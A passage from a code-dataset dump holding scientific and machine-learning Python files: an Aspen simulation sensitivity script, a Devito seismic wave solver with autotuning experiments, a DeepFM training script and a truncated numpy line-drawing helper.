sensitivity of outputs with respect to varied variables in .xlsm, values are enumerated (discrete) or given in range (continuous)\n\nExample\npython C:\\Share_GoogleDrive\\NREL\\Software\\Aspen_automation\\Scripts\\sensitivity_nonAspenVars.py -o C:\\Users\\cwu\\Desktop\\Outputs\\Aspen_automation\\Results\\Sugars\\sens_nonAspenVars -c C:\\Share_GoogleDrive\\NREL\\Software\\Aspen_automation\\Data\\Sugars\\sens_nonAspenVars_config.xlsx -a C:\\Share_GoogleDrive\\NREL\\Software\\Aspen_automation\\Data\\Sugars\\BC1707A_sugars_V10_mod-lite.bkp -e C:\\Share_GoogleDrive\\NREL\\Software\\Aspen_automation\\Data\\Sugars\\BC1707A_sugars_V10_mod.xlsm -n 100\n'''\n\n\n\nimport argparse\nimport os\nfrom i_o import parse_config, save_simulation_results, plot_hist\nfrom utilities import extract_input_data, generate_input_data, simulate_using_calculator\nfrom classes import Aspen, Excel\n\n\n\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser(description = 'This script estimates outputs according to varied variables in .xlsm, values are enumerated (discrete) or given in range (continuous)')\n\tparser.add_argument('-o', '--outDir', type = str, required = True, help = 'output directory')\n\tparser.add_argument('-c', '--configFile', type = str, required = True, help = 'config file, .xlsx')\n\tparser.add_argument('-a', '--aspenFile', type = str, required = True, help = 'Aspen model file, .bkp')\n\tparser.add_argument('-e', '--calculatorFile', type = str, required = True, help = 'excel calculator file, .xlsm')\n\tparser.add_argument('-d', '--varType', type = str, required = True, choices = ['dis', 'con'], help = 'input data type in config file, \"dis\" for discrete, \"con\" for continuous')\n\tparser.add_argument('-n', '--nruns', type = int, required = False, help = '# of simulation runs')\n\targs = parser.parse_args()\n\t\n\toutDir = args.outDir\n\tconfigFile = args.configFile\n\taspenFile = args.aspenFile\n\tcalculatorFile = args.calculatorFile\n\tvarType = args.varType\n\tnruns = args.nruns\n\t\n\tos.makedirs(outDir, exist_ok = True)\n\t\n\t\n\t# parse inputs and outputs\n\tinputInfos, outputInfos = parse_config(configFile)\n\t\n\tif varType == 'dis':\n\t\tinputData = extract_input_data(inputInfos)\n\telse:\n\t\tinputData = generate_input_data(inputInfos)\n\t\n\t\n\t# run simulation with calculator\n\ttry:\n\t\taspenModel = Aspen(aspenFile)\n\t\tcalculator = Excel(calculatorFile)\n\t\n\t\tsimResults = simulate_using_calculator(aspenModel, calculator, inputData, outputInfos, nruns)\n\t\n\tfinally:\n\t\taspenModel.close()\n\t\tcalculator.close()\n\t\n\t\n\t# save and plot results\n\tsave_simulation_results(simResults, outDir)\n\t\n\tplot_hist(simResults, outputInfos[['Output', 'Unit']], outDir)\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\t\n\n\n","sub_path":"AutoAspen/sensitivity_nonAspenVars.py","file_name":"sensitivity_nonAspenVars.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"16219830","text":"from devito import Function, TimeFunction, norm, Operator, Dimension, Scalar, Eq, Inc, configuration\nfrom devito.tools import memoized_meth\nfrom examples.seismic.acoustic.operators import (\n ForwardOperator, AdjointOperator, GradientOperator, BornOperator\n)\nfrom examples.checkpointing.checkpoint import DevitoCheckpoint, CheckpointOperator\nfrom pyrevolve import Revolver\nimport pyvista as pv\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom devito.types.basic import Scalar\nfrom matplotlib.pyplot import pause # noqa\nimport sys\nnp.set_printoptions(threshold=sys.maxsize) # pdb print full size\n\nclass AcousticWaveSolver(object):\n \"\"\"\n Solver object that provides operators for seismic inversion problems\n and encapsulates the time and space discretization for a given problem\n setup.\n\n Parameters\n ----------\n model : Model\n Physical model with domain parameters.\n geometry : AcquisitionGeometry\n Geometry object that contains the source (SparseTimeFunction) and\n receivers (SparseTimeFunction) and their position.\n kernel : str, optional\n Type of discretization, centered or shifted.\n space_order: int, optional\n Order of the spatial stencil discretisation. Defaults to 4.\n \"\"\"\n def __init__(self, model, geometry, kernel='OT2', space_order=4, **kwargs):\n self.model = model\n self.model._initialize_bcs(bcs=\"damp\")\n self.geometry = geometry\n\n assert self.model.grid == geometry.grid\n\n self.space_order = space_order\n self.kernel = kernel\n\n # Cache compiler options\n self._kwargs = kwargs\n\n @property\n def dt(self):\n # Time step can be \\sqrt{3}=1.73 bigger with 4th order\n if self.kernel == 'OT4':\n return self.model.dtype(1.73 * self.model.critical_dt)\n return self.model.critical_dt\n\n @memoized_meth\n def op_fwd(self, save=None, tteqs=(), **kwargs):\n \"\"\"Cached operator for forward runs with buffered wavefield\"\"\"\n return ForwardOperator(self.model, save=save, geometry=self.geometry,\n kernel=self.kernel, space_order=self.space_order,\n tteqs=tteqs, **self._kwargs)\n\n @memoized_meth\n def op_adj(self):\n \"\"\"Cached operator for adjoint runs\"\"\"\n return AdjointOperator(self.model, save=None, geometry=self.geometry,\n kernel=self.kernel, space_order=self.space_order,\n **self._kwargs)\n\n @memoized_meth\n def op_grad(self, save=True):\n \"\"\"Cached operator for gradient runs\"\"\"\n return GradientOperator(self.model, save=save, geometry=self.geometry,\n kernel=self.kernel, space_order=self.space_order,\n **self._kwargs)\n\n @memoized_meth\n def op_born(self):\n \"\"\"Cached operator for born runs\"\"\"\n return BornOperator(self.model, save=None, geometry=self.geometry,\n kernel=self.kernel, space_order=self.space_order,\n **self._kwargs)\n\n def forward(self, src=None, rec=None, u=None, vp=None, save=None, **kwargs):\n \"\"\"\n Forward modelling function that creates the necessary\n data objects for running a forward modelling operator.\n\n Parameters\n ----------\n src : SparseTimeFunction or array_like, optional\n Time series data for the injected source term.\n rec : SparseTimeFunction or array_like, optional\n The interpolated receiver data.\n u : TimeFunction, optional\n Stores the computed wavefield.\n vp : Function or float, optional\n The time-constant velocity.\n save : bool, optional\n Whether or not to save the entire (unrolled) wavefield.\n\n Returns\n -------\n Receiver, wavefield and performance summary\n \"\"\"\n # Source term is read-only, so re-use the default\n src = src or self.geometry.src\n # Create a new receiver object to store the result\n rec = rec or self.geometry.rec\n\n # Create the forward wavefield if not provided\n u = u or TimeFunction(name='u', grid=self.model.grid,\n save=self.geometry.nt if save else None,\n time_order=2, space_order=self.space_order)\n\n # Pick vp from model unless explicitly provided\n vp = vp or self.model.vp\n\n print(\"====Forward norm(u)\", norm(u))\n # Execute operator and return wavefield and receiver data\n # summary = self.op_fwd(save).apply(src=src, rec=rec, u=u, vp=vp,\n summary = self.op_fwd(save).apply(src=src, u=u, vp=vp,\n dt=kwargs.pop('dt', self.dt), **kwargs)\n print(\"====Forward norm(u)\", norm(u))\n \n\n regnormu = norm(u)\n if 0:\n cmap = plt.cm.get_cmap(\"viridis\")\n values = u.data[0, :, :, :]\n vistagrid = pv.UniformGrid()\n vistagrid.dimensions = np.array(values.shape) + 1\n vistagrid.spacing = (1, 1, 1)\n vistagrid.origin = (0, 0, 0) # The bottom left corner of the data set\n vistagrid.cell_arrays[\"values\"] = values.flatten(order=\"F\")\n vistaslices = vistagrid.slice_orthogonal()\n vistagrid.plot(show_edges=True)\n vistaslices.plot(cmap=cmap)\n\n print(\"Norm u:\", regnormu)\n\n s_u = TimeFunction(name='s_u', grid=self.model.grid, space_order=self.space_order, time_order=2)\n src_u = src.inject(field=s_u.forward, expr=src * self.model.grid.time_dim.spacing**2 / self.model.m)\n\n\n op_f = Operator([src_u])\n op_f.apply(src=src, dt=kwargs.pop('dt', self.dt))\n\n # import pdb;pdb.set_trace()\n print(\"Norm s_u\", norm(s_u))\n\n # Get the nonzero indices\n nzinds = np.nonzero(s_u.data[0]) # nzinds is a tuple\n assert len(nzinds) == len(self.model.grid.shape)\n shape = self.model.grid.shape\n x, y, z = self.model.grid.dimensions\n time = self.model.grid.time_dim\n t = self.model.grid.stepping_dim\n\n source_mask = Function(name='source_mask', shape=self.model.grid.shape, dimensions=(x, y, z), space_order=0, dtype=np.int32)\n\n source_id = Function(name='source_id', shape=shape, dimensions=(x, y, z), space_order=0, dtype=np.int32)\n print(\"source_id data indexes start from 0 now !!!\")\n\n # source_id.data[nzinds[0], nzinds[1], nzinds[2]] = tuple(np.arange(1, len(nzinds[0])+1))\n source_id.data[nzinds[0], nzinds[1], nzinds[2]] = tuple(np.arange(len(nzinds[0])))\n\n source_mask.data[nzinds[0], nzinds[1], nzinds[2]] = 1\n\n print(\"Number of unique affected points is:\", len(nzinds[0]))\n\n # Assert that first and last index are as expected\n assert(source_id.data[nzinds[0][0], nzinds[1][0], nzinds[2][0]] == 0)\n assert(source_id.data[nzinds[0][-1], nzinds[1][-1], nzinds[2][-1]] == len(nzinds[0])-1)\n assert(source_id.data[nzinds[0][len(nzinds[0])-1], nzinds[1][len(nzinds[0])-1], nzinds[2][len(nzinds[0])-1]] == len(nzinds[0])-1)\n\n assert(np.all(np.nonzero(source_id.data)) == np.all(np.nonzero(source_mask.data)))\n assert(np.all(np.nonzero(source_id.data)) == np.all(np.nonzero(s_u.data[0])))\n\n print(\"-At this point source_mask and source_id have been populated correctly-\")\n\n nnz_shape = (self.model.grid.shape[0], self.model.grid.shape[1])\n\n nnz_sp_source_mask = Function(name='nnz_sp_source_mask', shape=(list(nnz_shape)), dimensions=(x,y ), space_order=0, dtype=np.int32)\n\n nnz_sp_source_mask.data[:, :] = source_mask.data[:, :, :].sum(2)\n inds = np.where(source_mask.data == 1.)\n print(\"Grid - source positions:\", inds)\n maxz = len(np.unique(inds[-1]))\n # Change only 3rd dim\n sparse_shape = (self.model.grid.shape[0], self.model.grid.shape[1], maxz)\n\n assert(len(nnz_sp_source_mask.dimensions) == (len(source_mask.dimensions)-1))\n\n # Note : sparse_source_id is not needed as long as sparse info is kept in mask\n # sp_source_id.data[inds[0],inds[1],:] = inds[2][:maxz]\n\n id_dim = Dimension(name='id_dim')\n b_dim = Dimension(name='b_dim')\n\n save_src_u = TimeFunction(name='save_src_u', shape=(src.shape[0],\n nzinds[1].shape[0]), dimensions=(src.dimensions[0],\n id_dim))\n\n save_src_u_term = src.inject(field=save_src_u[src.dimensions[0], source_id], expr=src * self.model.grid.time_dim.spacing**2 / self.model.m)\n\n print(\"Injecting to empty grids\")\n op1 = Operator([save_src_u_term])\n op1.apply(src=src, dt=kwargs.pop('dt', self.dt))\n print(\"Injecting to empty grids finished\")\n sp_zi = Dimension(name='sp_zi')\n\n\n sp_source_id = Function(name='sp_source_id', shape=(list(sparse_shape)),\n dimensions=(x, y, sp_zi), space_order=0, dtype=np.int32)\n\n # Now holds IDs\n sp_source_id.data[inds[0], inds[1], :] = tuple(inds[-1][:len(np.unique(inds[-1]))])\n\n assert(np.count_nonzero(sp_source_id.data) == len(nzinds[0]))\n assert(len(sp_source_id.dimensions) == 3)\n\n # import pdb;pdb.set_trace()\n\n zind = Scalar(name='zind', dtype=np.int32)\n xb_size = Scalar(name='xb_size', dtype=np.int32)\n yb_size = Scalar(name='yb_size', dtype=np.int32)\n x0_blk0_size = Scalar(name='x0_blk0_size', dtype=np.int32)\n y0_blk0_size = Scalar(name='y0_blk0_size', dtype=np.int32)\n\n block_sizes = Function(name='block_sizes', shape=(4, ), dimensions=(b_dim,),\n space_order=0, dtype=np.int32)\n\n bsizes = (8, 8, 32, 32)\n block_sizes.data[:] = bsizes\n\n # eqxb = Eq(xb_size, block_sizes[0])\n # eqyb = Eq(yb_size, block_sizes[1])\n # eqxb2 = Eq(x0_blk0_size, block_sizes[2])\n # eqyb2 = Eq(y0_blk0_size, block_sizes[3])\n\n eq0 = Eq(sp_zi.symbolic_max, nnz_sp_source_mask[x, y] - 1,\n implicit_dims=(time, x, y))\n\n eq1 = Eq(zind, sp_source_id[x, y, sp_zi], implicit_dims=(time, x, y, sp_zi))\n\n # inj_u = source_mask[x, y, zind] * save_src_u[time, source_id[x, y, zind]]\n # Is source_mask needed /\n inj_u = save_src_u[time, source_id[x, y, zind]]\n\n eq_u = Inc(u.forward[t+1, x, y, zind], inj_u, implicit_dims=(time, x, y, sp_zi))\n\n # The additional time-tiling equations\n # tteqs = (eqxb, eqyb, eqxb2, eqyb2, eq0, eq1, eq_u, eq_v)\n\n performance_map = np.array([[0, 0, 0, 0, 0]])\n\n bxstart = 4\n bxend = 9\n bystart = 4\n byend = 9\n bstep = 4\n\n txstart = 32\n txend = 65\n tystart = 32\n tyend = 65\n\n tstep = 32\n # Temporal autotuning\n for tx in range(txstart, txend, tstep):\n # import pdb; pdb.set_trace()\n for ty in range(tystart, tyend, tstep):\n for bx in range(bxstart, bxend, bstep):\n for by in range(bystart, byend, bstep):\n\n block_sizes.data[:] = [tx, ty, bx, by]\n\n eqxb = Eq(xb_size, block_sizes[0])\n eqyb = Eq(yb_size, block_sizes[1])\n eqxb2 = Eq(x0_blk0_size, block_sizes[2])\n eqyb2 = Eq(y0_blk0_size, block_sizes[3])\n\n u.data[:] = 0\n print(\"-----\")\n tteqs = (eqxb, eqyb, eqxb2, eqyb2, eq0, eq1, eq_u)\n\n # import pdb; pdb.set_trace()\n\n # Execute operator and return wavefield and receiver data\n print(\"TT====Forward norm(u)\", norm(u))\n summary_tt = self.op_fwd(save, tteqs).apply(u=u, vp=vp,\n dt=kwargs.pop('dt', self.dt), **kwargs)\n print(\"TT====Forward norm(u)\", norm(u))\n # op_tt = self.op_fwd(save, tteqs)\n\n # Execute operator and return wavefield and receiver data\n #summary_tt = self.op_fwd(save).apply(src=src, rec=rec, u=u, vp=vp,\n # dt=kwargs.pop('dt', self.dt), **kwargs)\n\n # op_tt = self.op_fwd(kernel, save, tteqs)\n # summary_tt = op_tt.apply(u=u, dt=kwargs.pop('dt', self.dt), **kwargs)\n configuration['jit-backdoor'] = False\n norm_tt_u = norm(u)\n print(\"Norm u:\", regnormu)\n print(\"Norm(tt_u):\", norm_tt_u)\n configuration['jit-backdoor'] = True\n\n print(\"===Temporal blocking======================================\")\n\n performance_map = np.append(performance_map, [[tx, ty, bx, by, summary_tt.globals['fdlike'].gpointss]], 0)\n \n print(performance_map)\n # tids = np.unique(performance_map[:, 0])\n\n #for tid in tids:\n bids = np.where((performance_map[:, 0] == tx) & (performance_map[:, 1] == ty))\n bx_data = np.unique(performance_map[bids, 2])\n by_data = np.unique(performance_map[bids, 3])\n gptss_data = performance_map[bids, 4]\n gptss_data = gptss_data.reshape(len(bx_data), len(by_data))\n\n fig, ax = plt.subplots()\n im = ax.imshow(gptss_data); #pause(2)\n # We want to show all ticks...\n ax.set_xticks(np.arange(len(bx_data)))\n ax.set_yticks(np.arange(len(by_data)))\n # ... and label them with the respective list entries\n ax.set_xticklabels(bx_data)\n ax.set_yticklabels(by_data)\n\n ax.set_title(\"Gpts/s for fixed tile size. (Sweeping block sizes)\")\n fig.tight_layout()\n\n fig.colorbar(im, ax=ax)\n # ax = sns.heatmap(gptss_data, linewidth=0.5)\n plt.savefig(str(shape[0]) + str(np.int32(tx)) + str(np.int32(ty)) + \".pdf\")\n\n\n if 1:\n cmap = plt.cm.get_cmap(\"viridis\")\n values = u.data[0, :, :, :]\n vistagrid = pv.UniformGrid()\n vistagrid.dimensions = np.array(values.shape) + 1\n vistagrid.spacing = (1, 1, 1)\n vistagrid.origin = (0, 0, 0) # The bottom left corner of the data set\n vistagrid.cell_arrays[\"values\"] = values.flatten(order=\"F\")\n vistaslices = vistagrid.slice_orthogonal()\n vistagrid.plot(show_edges=True)\n vistaslices.plot(cmap=cmap)\n\n # import pdb;pdb.set_trace()\n return rec, u, summary\n\n def adjoint(self, rec, srca=None, v=None, vp=None, **kwargs):\n \"\"\"\n Adjoint modelling function that creates the necessary\n data objects for running an adjoint modelling operator.\n\n Parameters\n ----------\n rec : SparseTimeFunction or array-like\n The receiver data. Please note that\n these act as the source term in the adjoint run.\n srca : SparseTimeFunction or array-like\n The resulting data for the interpolated at the\n original source location.\n v: TimeFunction, optional\n The computed wavefield.\n vp : Function or float, optional\n The time-constant velocity.\n\n Returns\n -------\n Adjoint source, wavefield and performance summary.\n \"\"\"\n # Create a new adjoint source and receiver symbol\n srca = srca or self.geometry.new_src(name='srca', src_type=None)\n\n # Create the adjoint wavefield if not provided\n v = v or TimeFunction(name='v', grid=self.model.grid,\n time_order=2, space_order=self.space_order)\n\n # Pick vp from model unless explicitly provided\n vp = vp or self.model.vp\n\n # Execute operator and return wavefield and receiver data\n summary = self.op_adj().apply(srca=srca, rec=rec, v=v, vp=vp,\n dt=kwargs.pop('dt', self.dt), **kwargs)\n return srca, v, summary\n\n def jacobian_adjoint(self, rec, u, v=None, grad=None, vp=None,\n checkpointing=False, **kwargs):\n \"\"\"\n Gradient modelling function for computing the adjoint of the\n Linearized Born modelling function, ie. the action of the\n Jacobian adjoint on an input data.\n\n Parameters\n ----------\n rec : SparseTimeFunction\n Receiver data.\n u : TimeFunction\n Full wavefield `u` (created with save=True).\n v : TimeFunction, optional\n Stores the computed wavefield.\n grad : Function, optional\n Stores the gradient field.\n vp : Function or float, optional\n The time-constant velocity.\n\n Returns\n -------\n Gradient field and performance summary.\n \"\"\"\n dt = kwargs.pop('dt', self.dt)\n # Gradient symbol\n grad = grad or Function(name='grad', grid=self.model.grid)\n\n # Create the forward wavefield\n v = v or TimeFunction(name='v', grid=self.model.grid,\n time_order=2, space_order=self.space_order)\n\n # Pick vp from model unless explicitly provided\n vp = vp or self.model.vp\n\n if checkpointing:\n u = TimeFunction(name='u', grid=self.model.grid,\n time_order=2, space_order=self.space_order)\n cp = DevitoCheckpoint([u])\n n_checkpoints = None\n wrap_fw = CheckpointOperator(self.op_fwd(save=False), src=self.geometry.src,\n u=u, vp=vp, dt=dt)\n wrap_rev = CheckpointOperator(self.op_grad(save=False), u=u, v=v,\n vp=vp, rec=rec, dt=dt, grad=grad)\n\n # Run forward\n wrp = Revolver(cp, wrap_fw, wrap_rev, n_checkpoints, rec.data.shape[0]-2)\n wrp.apply_forward()\n summary = wrp.apply_reverse()\n else:\n summary = self.op_grad().apply(rec=rec, grad=grad, v=v, u=u, vp=vp,\n dt=dt, **kwargs)\n return grad, summary\n\n def jacobian(self, dmin, src=None, rec=None, u=None, U=None, vp=None, **kwargs):\n \"\"\"\n Linearized Born modelling function that creates the necessary\n data objects for running an adjoint modelling operator.\n\n Parameters\n ----------\n src : SparseTimeFunction or array_like, optional\n Time series data for the injected source term.\n rec : SparseTimeFunction or array_like, optional\n The interpolated receiver data.\n u : TimeFunction, optional\n The forward wavefield.\n U : TimeFunction, optional\n The linearized wavefield.\n vp : Function or float, optional\n The time-constant velocity.\n \"\"\"\n # Source term is read-only, so re-use the default\n src = src or self.geometry.src\n # Create a new receiver object to store the result\n rec = rec or self.geometry.rec\n\n # Create the forward wavefields u and U if not provided\n u = u or TimeFunction(name='u', grid=self.model.grid,\n time_order=2, space_order=self.space_order)\n U = U or TimeFunction(name='U', grid=self.model.grid,\n time_order=2, space_order=self.space_order)\n\n # Pick vp from model unless explicitly provided\n vp = vp or self.model.vp\n\n # Execute operator and return wavefield and receiver data\n summary = self.op_born().apply(dm=dmin, u=u, U=U, src=src, rec=rec,\n vp=vp, dt=kwargs.pop('dt', self.dt), **kwargs)\n return rec, u, U, summary\n\n # Backward compatibility\n born = jacobian\n gradient = jacobian_adjoint\n","sub_path":"examples/seismic/acoustic/wavesolver.py","file_name":"wavesolver.py","file_ext":"py","file_size_in_byte":20189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"244347952","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2020 Huawei Technologies Co., Ltd\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at# \n# \n# http://www.apache.org/licenses/LICENSE-2.0# \n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport os\nimport time\nimport random\nimport argparse\nimport configparser\n\nimport numpy as np\nimport pandas as pd\n\nimport torch\nif torch.__version__ >= \"1.8\":\n import torch_npu\n\nfrom sklearn.metrics import log_loss, roc_auc_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\n\nfrom deepctr_torch.inputs import SparseFeat, DenseFeat, get_feature_names\nfrom deepctr_torch.models import DeepFM\n\n\nparser = argparse.ArgumentParser(description='DeepFM for PyTorch')\nparser.add_argument('--seed', default=1234, type=int,\n help='seed for initializing training.')\n\nparser.add_argument('--use_npu', default=False, action='store_true', help='8p distributed training')\nparser.add_argument('--use_cuda', default=False, action='store_true', help='8p distributed training')\nparser.add_argument('--device_id', default=0, type=int, help='device id')\nparser.add_argument('--dist', default=False, action='store_true', help='8p distributed training')\nparser.add_argument('--device_num', default=1, type=int, help='num of npu device for training')\nparser.add_argument('--init_checkpoint', default='', type=str, help='init checkpoint for resume')\n\nparser.add_argument('--amp', default=False, action='store_true',\n help='use amp to train the model')\nparser.add_argument('--loss_scale', default=-1, type=float,\n help='loss scale using in amp, default -1 means dynamic')\nparser.add_argument('--opt_level', default='O1', type=str,\n help='apex opt level')\n\nparser.add_argument('--data_path', required=True, type=str, help='dataset repository path')\nparser.add_argument('--lr', default=0.0001, type=float, help='learning rate for training')\nparser.add_argument('--optim', default='adam', type=str, help='optimizer for model')\nparser.add_argument('--test_size', default=0.1, type=float, help='data size for testing, while the rest for training')\nparser.add_argument('--batch_size', default=1024, type=int, help='batch size for training and testing')\nparser.add_argument('--epochs', default=3, type=int, help='epochs for training')\nparser.add_argument('--steps', default=0, type=int, help='steps for training')\n\n\n# data config\nconfig = configparser.ConfigParser()\n\n\ndef fix_random(seed):\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n random.seed(seed)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n print(args)\n\n # data config\n config.read(args.data_path + '/data.ini')\n train_sample_num = int(config.get('data', 'train_sample_num'))\n test_sample_num = int(config.get('data', 'test_sample_num'))\n\n fix_random(args.seed)\n\n sparse_features = config.get('data', 'sparse_features').split(',')\n dense_features = config.get('data', 'dense_features').split(',')\n target = config.get('data', 'target').split(',')\n\n total_trainval_sample = train_sample_num\n nrows = total_trainval_sample // args.device_num\n skip_rows = list(range(1, 1 + args.device_id * nrows)) if args.device_num > 1 else None\n\n # 1.Loading preprocessed data, where label encoded for sparse features, \n # and simple Transformation for dense features is done\n print('Loading processed data...')\n start_time = time.time()\n data_trainval = pd.read_csv(args.data_path + '/deepfm_trainval.txt', sep='\\t', skiprows=skip_rows, nrows=nrows)\n data_test = pd.read_csv(args.data_path + '/deepfm_test.txt', sep='\\t')\n print('Data loaded in {}s'.format(time.time() - start_time))\n\n # 2.count #unique features for each sparse field,and record dense feature field name\n sparse_nunique_list = config.get('data', 'sparse_nunique').split(',')\n sparse_nunique = [int(sparse_nunique_list[i]) for i, _ in enumerate(sparse_nunique_list)]\n fixlen_feature_columns = [SparseFeat(feat, sparse_nunique[idx], embedding_dim=8)\n for idx, feat in enumerate(sparse_features)] + [DenseFeat(feat, 1, )\n for feat in dense_features]\n print(fixlen_feature_columns)\n\n dnn_feature_columns = fixlen_feature_columns\n linear_feature_columns = fixlen_feature_columns\n\n feature_names = get_feature_names(\n linear_feature_columns + dnn_feature_columns)\n\n # 3.generate input data for model\n print('Generating input data for model...')\n start_time = time.time()\n train, test = data_trainval, data_test\n train_model_input = {name: train[name].astype(float) for name in feature_names}\n test_model_input = {name: test[name].astype(float) for name in feature_names}\n print('Input data generated in {}s'.format(time.time() - start_time))\n\n # 4.Define Model,train,predict and evaluate\n if args.dist:\n os.environ['MASTER_ADDR'] = '127.0.0.1'\n os.environ['MASTER_PORT'] = '29680'\n if args.use_npu:\n torch.distributed.init_process_group(backend='hccl', world_size=args.device_num, rank=args.device_id)\n elif args.use_cuda:\n torch.distributed.init_process_group(backend='nccl', world_size=args.device_num, rank=args.device_id)\n else:\n raise RuntimeError(\"Distributed training is not supported on this platfrom\")\n print('distributed train enabled')\n\n device = 'cpu'\n if args.use_npu:\n device = 'npu:' + str(args.device_id)\n torch.npu.set_device(device)\n elif args.use_cuda:\n device = 'cuda:' + str(args.device_id)\n torch.cuda.set_device(device)\n print('train on: ', device)\n\n model = DeepFM(linear_feature_columns=linear_feature_columns, dnn_feature_columns=dnn_feature_columns,\n task='binary', dnn_hidden_units=(512, 256), dnn_dropout=0.5,\n sparse_features_len=len(sparse_features),\n device=device, l2_reg_linear=0, l2_reg_embedding=0, dist=args.dist)\n\n model.compile(args.optim, \"binary_crossentropy\",\n metrics=[\"binary_crossentropy\", \"auc\"], lr=args.lr)\n\n history = model.fit(train_model_input, train[target].values, batch_size=args.batch_size, epochs=args.epochs,\n verbose=2, validation_split=0.1, args=args)\n pred_ans = model.predict(test_model_input, args.batch_size)\n print(\"\")\n print(\"test LogLoss\", round(log_loss(test[target].values, pred_ans), 4))\n print(\"test AUC\", round(roc_auc_score(test[target].values, pred_ans), 4))\n","sub_path":"PyTorch/built-in/others/DeepFM_for_PyTorch/run_classification_criteo_deepfm.py","file_name":"run_classification_criteo_deepfm.py","file_ext":"py","file_size_in_byte":7108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"613143755","text":"import numpy as np\n\ndef RP_linedraw(i_p, j_p, i_c, j_c, for_back, extensionflag, imdim):\n\t'''\n\tSUMMARY: \n\t'RP_linedraw': draws a raster-based line from the center pixel (i,j)_c\n\tto the edge pixel (i,j)_p. Used primarily in the 'RP_thickness' code.\n\n\tUSING CODE:\n\tPosition 'i_p' and 'j_p', and 'i_c' and 'j_c' correspond to the pixel \n\tposition of the target pixel and center, respectively - these positions\n\tare relative to the window size created using the dimensions specified by\n\t'imdim'. 'for_back' specifies whether the line is to be extended forward\n\t('for_back' = 1) from the center pixel to the target pixel, or backwards\n\t('for_back = 0) away from the target pixel, but on the same slope.\n\t'extensionflag' specifies whether the line is to extend to the target \n\tpixel ('extensionflag' = 0) or past it to the edge of the window \n\t('extensionflag' = 1).\n\n\tPARAMETERS:\n\tA. INPUTS - \n\t1. i_p: row position for the off-center pixel (y).\n\t2. j_p: column position for the off-center pixel (x).\n\t3. i_c: row position for the center pixel (y).\n\t4. j_c: column position for the center pixel (x).\n\t5. for_back: specification for whether the drawn line will extend forwards\n\t(1) or backwards (0).\n\t6. extensionflag: specification for whether the drawn line will stop at\n\tthe off-center pixel (0) or at the edge of the window (1).\n\n\tB. OUTPUTS -\n\t1. img_out: image with dimensions 'imdim', with a line drawn under the \n\tconditions specified above.\n\n\n\tEXAMPLE:\n\tFor a 81x81 array, in which there are two pixel positions [60,30] and \n\t[55,20], we can specify 'i_p' and 'j_p' to be 60 and 30, respectively, \n\tand 'i_c' and 'j_c' to be 40 and 40, respectively. 'imdim' would correspond\n\tto [81,81]. If we set 'for_back' to 1 and 'extensionflag' to 0, a series of \n\tpixels approximating a line will be drawn between the points of [60,30] and \n\t[40,40], outputted under the variable name 'img_out'.\n\n\t'''\n\n\timg_out = np.zeros(imdim)\n\t#I. Determine quadrant\n\tif j_p == j_c:\t\t\t\t\t#Vertical line\n\t\tif i_p < i_c:\n\t\t\tif for_back == 1:\n\t\t\t\tquadval = 12\t\t\t#Vertical line upwards\n\t\t\telse:\n\t\t\t\tquadval = 34\n\t\telse:\n\t\t\tif for_back == 1:\n\t\t\t\tquadval = 34\t\t\t#Vertical line downwards\n\t\t\telse:\n\t\t\t\tquadval = 12\n\telse:\n\t\tif i_p == i_c:\t\t\t\t#Horizontal line\n\t\t\tif j_p < j_c:\n\t\t\t\tif for_back == 1:\n\t\t\t\t\tquadval = 13\t\t#Horizontal line left\n\t\t\t\telse:\n\t\t\t\t\tquadval = 24\n\t\t\telse:\n\t\t\t\tif for_back == 1:\n\t\t\t\t\tquadval = 24\t\t#Horizontal line right\n\t\t\t\telse:\n\t\t\t\t\tquadval = 13\n\t\telse:\n\t\t\tif i_p < i_c:\n\t\t\t\tif j_p < j_c:\n\t\t\t\t\tif for_back == 1:\n\t\t\t\t\t\tquadval = 1\t\t#Top left\n\t\t\t\t\t\tx = np.array(range(0, j_c))\n\t\t\t\t\telse:\n\t\t\t\t\t\tquadval = 4\n\t\t\t\t\t\tx = np.array(range(j_c, imdim[1]))\n\t\t\t\telse:\n\t\t\t\t\tif for_back == 1:\n\t\t\t\t\t\tquadval = 2 \t#Top right\n\t\t\t\t\t\tx = np.array(range(j_c, imdim[1]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tquadval = 3\n\t\t\t\t\t\tx = np.array(range(0, j_c))\n\t\t\telse:\n\t\t\t\tif j_p < j_c:\n\t\t\t\t\tif for_back == 1:\n\t\t\t\t\t\tquadval = 3 \t#Bottom left\n\t\t\t\t\t\tx = np.array(range(0, j_c))\n\t\t\t\t\telse:\n\t\t\t\t\t\tquadval = 2\n\t\t\t\t\t\tx = np.array(range(j_c, imdim[1]))\n\n\t\t\t\telse:\n\t\t\t\t\tif for_back == 1:\n\t\t\t\t\t\tquadval = 4 \t#Bottom right\n\t\t\t\t\t\tx = np.array(range(j_c, imdim[1]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tquadval = 1\n\t\t\t\t\t\tx = np.array(range(0, j_c))\n\t\t\t\n\t\t\txrangeval = np.shape(x)[0]\n\n\n\n\tif quadval == 12:\n\t\timg_out[0:i_c, j_c] = img_out[0:i_c, j_c] + 2\n\tif quadval == 34:\n\t\timg_out[i_c:imdim[0], j_c] = img_out[i_c:imdim[0], j_c] + 2\n\tif quadval == 13:\n\t\timg_out[i_c, 0:j_c] = img_out[i_c, 0:j_c] + 2\n\tif quadval == 